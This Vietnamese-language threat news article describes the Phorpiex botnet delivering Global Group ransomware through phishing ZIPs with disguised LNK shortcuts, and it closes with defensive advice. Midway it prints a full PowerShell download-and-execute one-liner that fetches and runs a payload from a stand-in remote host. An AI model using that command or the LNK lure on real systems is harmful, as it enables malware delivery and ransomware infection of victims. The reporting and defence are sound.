Mã độc Ransomware Global Group: Nguy hiểm từ Phorpiex Botnet

Bối cảnh **an ninh mạng** hiện tại đang chứng kiến sự trỗi dậy của **Phorpiex botnet**, một nền tảng malware-as-a-service đã hoạt động hơn một thập kỷ. Trong một chiến dịch có cường độ cao gần đây, những kẻ tấn công đang phân phối các email lừa đảo (phishing) với tiêu đề gây hiểu lầm “Your Document.” Đây là một **mối đe dọa mạng** nghiêm trọng nhắm đến người dùng cá nhân và tổ chức.

Các email này thúc giục người nhận mở một tệp đính kèm có vẻ là tệp ZIP vô hại chứa tài liệu. Tuy nhiên, đây là một cái bẫy được tính toán kỹ lưỡng, được thiết kế để triển khai **mã độc ransomware** mang tên **Global Group**, một biến thể kế nhiệm của họ ransomware Mamona.

Sự Trở Lại Của Phorpiex Botnet và Chiến Lược **Tấn Công Mạng**

**Phorpiex botnet** đã khẳng định vị thế của mình trong thế giới ngầm mạng từ lâu, nổi tiếng với khả năng phân phối nhiều loại mã độc khác nhau, từ spam đến các chiến dịch tấn công quy mô lớn. Sự tái xuất hiện của botnet này cho thấy tính bền bỉ và khả năng thích nghi liên tục của các nhóm tin tặc.

Kỹ Thuật Social Engineering Qua Email Lừa Đảo

Vector tấn công này phụ thuộc rất nhiều vào kỹ thuật **social engineering** và việc lạm dụng các tệp tin phím tắt của Windows (LNK). Các email lừa đảo thường mang chủ đề hấp dẫn để dụ dỗ nạn nhân.

Người dùng bị lừa mở tệp đính kèm giả mạo, tưởng rằng đó là tài liệu hợp pháp. Điều này được thực hiện thông qua nhiều chiến thuật:

• Email có tiêu đề lừa đảo như “Your Document.”
• Tệp đính kèm dạng ZIP chứa các tệp LNK độc hại.

Lợi Dụng Lỗ Hổng Từ LNK File và Kỹ Thuật Đúp Đuôi Tệp

Kẻ tấn công ngụy trang các tệp phím tắt độc hại này thành tài liệu hợp pháp bằng cách sử dụng kỹ thuật đúp đuôi tệp, ví dụ: “Document.doc.lnk.”

Do Windows thường ẩn phần mở rộng của tệp theo mặc định, người dùng không nghi ngờ sẽ tin rằng họ đang mở một tệp Word tiêu chuẩn. Để tăng cường sự thuyết phục, tệp phím tắt sử dụng biểu tượng chuẩn từ các tài nguyên hợp pháp của Windows, giảm đáng kể sự nghi ngờ của người dùng và tăng khả năng lây nhiễm thành công.

Tìm hiểu thêm về các chiến thuật **social engineering** có thể giúp phòng tránh hiệu quả hơn tại Cybersecurity News.

**Mã Độc Ransomware** Global Group: Cơ Chế Hoạt Động Nguy Hiểm

Các nhà nghiên cứu của Forcepoint đã xác định **mã độc ransomware** này và lưu ý rằng quy trình lây nhiễm được thiết kế để hoạt động lén lút và nhanh chóng.

Quy Trình Lây Nhiễm và Kỹ Thuật Living Off the Land

Ngay sau khi nạn nhân nhấp vào tệp phím tắt độc hại, các lệnh sẽ được thực thi âm thầm trong nền. Tệp phím tắt khởi chạy Bộ xử lý lệnh của Windows (Windows Command Processor), sau đó gọi PowerShell để tải payload thứ cấp từ một máy chủ từ xa.

Payload này, thường được đặt tên giống như một driver của Windows, chính là **mã độc ransomware** Global Group. Toàn bộ quy trình tận dụng các kỹ thuật “Living off the Land,” sử dụng các công cụ hệ thống có sẵn để tránh kích hoạt các cảnh báo bảo mật truyền thống.

C:\Windows\System32\cmd.exe /c start /b powershell.exe -NoP -NonI -Exec Bypass -C "Invoke-WebRequest -Uri hxxp://remoteserver.com/payload.exe -OutFile C:\Temp\driver.exe; Start-Process C:\Temp\driver.exe"

Chi tiết về nghiên cứu này có thể được tìm thấy trong báo cáo của Forcepoint tại đây và thông tin về **ransomware Global Group** có sẵn trên Cybersecurity News.

Chế Độ Vận Hành “Mute” và Khả Năng Mã Hóa Ngoại Tuyến

Điểm đáng báo động nhất của **mã độc ransomware** Global Group là khả năng hoạt động ở chế độ “mute” hoàn toàn. Không giống như các loại ransomware truyền thống giao tiếp với máy chủ command-and-control trung tâm để lấy khóa mã hóa, biến thể này thực hiện tất cả các hoạt động của nó cục bộ trên máy bị xâm nhập.

Nó tự động tạo khóa mã hóa trực tiếp trên hệ thống máy chủ, cho phép thực thi thành công ngay cả trong môi trường ngoại tuyến hoặc các hệ thống bị cách ly (air-gapped). Khả năng tự chủ này khiến nó đặc biệt nguy hiểm, vì nó vượt qua các hệ thống phát hiện dựa trên mạng (network-based detection systems) thường tìm kiếm lưu lượng truy cập đáng ngờ ra bên ngoài.

Xem thêm về phát hiện xâm nhập mạng tại Cybersecurity News.

Biện Pháp Chống Điều Tra và Phá Hoại Dữ Liệu

Hơn nữa, **mã độc ransomware** này sử dụng các chiến thuật chống điều tra (anti-forensic tactics) để xóa dấu vết của mình. Nó sử dụng lệnh ping làm bộ đếm thời gian để trì hoãn việc thực thi một chút trước khi tự xóa binary của chính nó khỏi đĩa.

Bằng cách loại bỏ tệp thực thi ban đầu, những kẻ tấn công gây khó khăn cho các cuộc điều tra sau sự cố. **Mã độc ransomware** cũng tìm kiếm và chấm dứt các tiến trình liên quan đến công cụ phân tích và cơ sở dữ liệu, đảm bảo nó có thể mã hóa lượng dữ liệu tối đa mà không bị gián đoạn.

Chiến Lược Phòng Chống và Nâng Cao **An Toàn Thông Tin**

Để đảm bảo **an toàn thông tin**, các tổ chức cần thực hiện các biện pháp bảo vệ chủ động chống lại **mã độc ransomware** Global Group và các mối đe dọa tương tự.

Ngăn Chặn tại Cổng Email

Các tổ chức nên chặn các tệp đính kèm có thể thực thi được như tệp LNK tại cổng email (email gateway). Đây là một lớp phòng thủ quan trọng để ngăn chặn các cuộc tấn công lừa đảo ngay từ đầu.

Việc lọc nghiêm ngặt các loại tệp nguy hiểm có thể giảm đáng kể rủi ro lây nhiễm. Thông tin thêm về cách tin tặc vượt qua cổng email bảo mật có thể tham khảo tại đây.

Giám Sát Endpoint Nâng Cao và Phát Hiện Hành Vi

Ưu tiên giám sát endpoint (endpoint monitoring) là điều cần thiết. Vì mối đe dọa này có thể hoạt động ngoại tuyến, khả năng phát hiện dựa trên hành vi (behavior-based detection) trở nên cực kỳ quan trọng để ngăn chặn quá trình mã hóa trước khi dữ liệu bị mất vĩnh viễn.

Các giải pháp bảo mật endpoint hiện đại nên tập trung vào việc phát hiện các hoạt động bất thường của hệ thống, chẳng hạn như việc tạo và thực thi tệp tin phím tắt đáng ngờ, hoặc hành vi truy cập và mã hóa tệp hàng loạt.